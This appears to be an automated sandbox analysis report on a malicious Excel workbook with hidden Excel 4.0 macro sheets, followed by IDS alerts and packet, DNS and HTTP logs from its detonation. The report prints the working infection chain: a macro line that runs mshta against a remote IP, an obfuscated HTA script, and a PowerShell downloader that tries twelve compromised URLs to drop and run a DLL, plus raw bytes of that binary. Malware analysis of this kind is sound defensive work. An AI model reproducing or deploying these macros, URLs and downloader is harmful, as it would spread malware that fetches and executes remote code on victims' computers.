Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	76002
Entropy:	7.62172227998
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE 3 False 0 False post 2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE 3 False 0 False pre 2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-20:58:34.140470	TCP	2034631	ET TROJAN Maldoc Activity (set)	49166	80	192.168.2.22	91.240.118.172

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 20:58:29.283057928 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.341985941 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.342158079 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.342793941 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.401585102 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402276993 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402317047 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402357101 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402394056 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402399063 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402432919 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402443886 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402462959 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402487040 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402503967 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402528048 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402554035 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402571917 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402574062 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402606010 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402631998 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402640104 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402662039 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402704000 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.423748016 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.075831890 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.137269974 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.137376070 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.140470028 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.201698065 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202456951 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202501059 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202646971 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.276338100 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:37.292212009 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:43.298949957 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:44.513869047 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:55.414619923 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.599175930 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.599543095 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.599576950 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.783878088 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793814898 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793844938 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793876886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793893099 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793905973 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793919086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793926001 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793936968 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793956995 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793957949 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793970108 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793976068 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793992996 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.794100046 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972629070 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972661018 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972676992 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972693920 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972709894 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972726107 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972742081 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972753048 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972765923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972781897 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972798109 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972804070 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972814083 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972831011 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972835064 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972841024 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972853899 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972882986 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972914934 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972928047 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972930908 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972948074 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972965956 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972969055 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.973165035 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154421091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154453039 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154474020 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154491901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154504061 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154515982 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154529095 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154541969 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154557943 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154567003 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154571056 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154589891 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154608011 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154632092 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154649019 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154666901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154684067 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154701948 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154717922 CET	80	49168	103.206.244.105	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 20:58:34.245244980 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 20:58:34.264126062 CET	53	52167	8.8.8.8	192.168.2.22
Jan 28, 2022 20:58:55.395302057 CET	50591	53	192.168.2.22	8.8.8.8
Jan 28, 2022 20:58:55.413871050 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 20:58:34.245244980 CET	192.168.2.22	8.8.8.8	0x872b	Standard query (0)	hostfeeling.com	A (IP address)	IN (0x0001)
Jan 28, 2022 20:58:55.395302057 CET	192.168.2.22	8.8.8.8	0x9ac	Standard query (0)	jurnalpjf.lan.go.id	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 20:58:34.264126062 CET	8.8.8.8	192.168.2.22	0x872b	No error (0)	hostfeeling.com		164.90.147.135	A (IP address)	IN (0x0001)
Jan 28, 2022 20:58:55.413871050 CET	8.8.8.8	192.168.2.22	0x9ac	No error (0)	jurnalpjf.lan.go.id		103.206.244.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.240.118.172

jurnalpjf.lan.go.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:29.342793941 CET	0	OUT	GET /gg/ff/fe.html HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 20:58:29.402276993 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 19:58:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:34.140470028 CET	13	OUT	GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 20:58:34.202456951 CET	14	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 19:58:34 GMT Content-Type: image/png Content-Length: 1199 Connection: keep-alive Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT ETag: "4af-5d6a59dbe5e00" Accept-Ranges: bytes Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49168	103.206.244.105	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:55.599576950 CET	15	OUT	GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
Jan 28, 2022 20:58:55.793814898 CET	16	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 19:58:55 GMT Server: Apache/2.4.6 (CentOS) PHP/7.4.27 X-Powered-By: PHP/7.4.27 Set-Cookie: 61f44affaa0ef=1643399935; expires=Fri, 28-Jan-2022 19:59:55 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 19:58:55 GMT Expires: Fri, 28 Jan 2022 19:58:55 GMT Content-Disposition: attachment; filename="Fw6A4ZWhOBNhoQZNE5.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 